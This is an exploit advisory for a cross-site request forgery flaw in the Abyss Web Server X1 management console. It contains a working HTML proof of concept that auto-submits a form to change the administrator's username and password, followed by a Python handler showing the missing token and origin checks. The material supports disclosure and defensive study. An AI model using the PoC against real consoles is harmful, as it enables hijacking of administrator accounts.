Abyss Web Server X1 – Cross-Site Request Forgery

  • Author: John Leitch
    Date: 2010-05-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12640/
  • http://osvdb.org/show/osvdb/64693
    http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html
    
    Abyss Web Server X1 XSRF
    <http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html>
    A cross-site request forgery vulnerability in the Abyss Web Server X1
    <http://www.aprelium.com/abyssws/download.php> management console can be
    exploited to change both the username and password of the logged-in user.
    An attacker who gets an authenticated administrator to open a page
    containing the form below has the browser auto-submit the credential-change
    request to the console (port 9999 in the PoC) with the administrator's
    session attached; the console accepts it because the request carries no
    per-session token and its origin is not checked.
    PoC:
    
     <html>
     <body onload="document.forms[0].submit()">
     <form method="post" action="http://localhost:9999/console/credentials">
     <input type="hidden" name="/console/credentials/login" value="new_username" />
     <input type="hidden" name="/console/credentials/password/$pass1" value="new_password" />
     <input type="hidden" name="/console/credentials/password/$pass2" value="new_password" />
     <input type="hidden" name="/console/credentials/bok" value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />
     </form>
     </body>
     </html>
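    As an added example, not code from this advisory or from Aprelium's
    server, the following Python handler for a credential-change endpoint
    shows the two checks whose absence the PoC above relies on: a
    per-session synchronizer token embedded in the real console form, and an
    Origin/Referer check against the console's own origin. The console origin,
    the csrf_token field name, the in-memory session store and the request
    layout (a headers dict plus a form dict) are assumptions made for the
    example; the form field names are the ones the PoC submits. demo() replays
    the PoC's post (attacker origin, no token) and then a legitimate post.

```python
# Added example (not Abyss Web Server code): a minimal /console/credentials
# handler with the anti-CSRF checks the PoC exploits the lack of.
# CONSOLE_ORIGIN, the csrf_token field and the session store are assumptions.
import hmac
import secrets
from urllib.parse import urlsplit

CONSOLE_ORIGIN = "http://localhost:9999"   # assumed console origin (port taken from the PoC)
_session_tokens = {}                        # session id -> CSRF token (in-memory stand-in)


def issue_csrf_token(session_id: str) -> str:
    """Mint a fresh unguessable token for a session; the real console form would embed it."""
    token = secrets.token_urlsafe(32)
    _session_tokens[session_id] = token
    return token


def _origin_ok(headers: dict) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is the console itself.
    The PoC's auto-submitted form arrives with the attacker page's origin."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False            # neither header present: refuse the state change
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == CONSOLE_ORIGIN


def change_credentials(session_id: str, headers: dict, form: dict) -> tuple:
    """Return (status, message) for a POST to /console/credentials."""
    if not _origin_ok(headers):
        return 403, "cross-site request rejected (origin)"
    expected = _session_tokens.get(session_id)
    supplied = form.get("csrf_token", "")
    # Constant-time comparison; encode to bytes so non-ASCII input cannot raise.
    if expected is None or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "cross-site request rejected (missing or bad token)"
    if form.get("/console/credentials/password/$pass1") != form.get("/console/credentials/password/$pass2"):
        return 400, "passwords do not match"
    issue_csrf_token(session_id)    # token is single-use: rotate after a successful change
    return 200, "credentials updated for " + form.get("/console/credentials/login", "")


def demo() -> tuple:
    """Replay the PoC's form post, then a legitimate one; return both HTTP statuses."""
    sid = "admin-session"
    token = issue_csrf_token(sid)
    poc_form = {   # constructed: exactly the fields the PoC submits, and no token
        "/console/credentials/login": "new_username",
        "/console/credentials/password/$pass1": "new_password",
        "/console/credentials/password/$pass2": "new_password",
        "/console/credentials/bok": "%C2%A0%C2%A0OK%C2%A0%C2%A0",
    }
    poc_status, _ = change_credentials(sid, {"Origin": "http://attacker.example"}, poc_form)
    legit_form = dict(poc_form, csrf_token=token)
    ok_status, _ = change_credentials(sid, {"Origin": CONSOLE_ORIGIN}, legit_form)
    return poc_status, ok_status


if __name__ == "__main__":
    print(demo())   # (403, 200)
```

    Either check on its own already defeats the PoC as written: the attacker
    page cannot read the administrator's token across origins, and a form
    posted from it cannot forge the Origin header. Keeping both is cheap and
    covers clients that omit one of the headers.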
    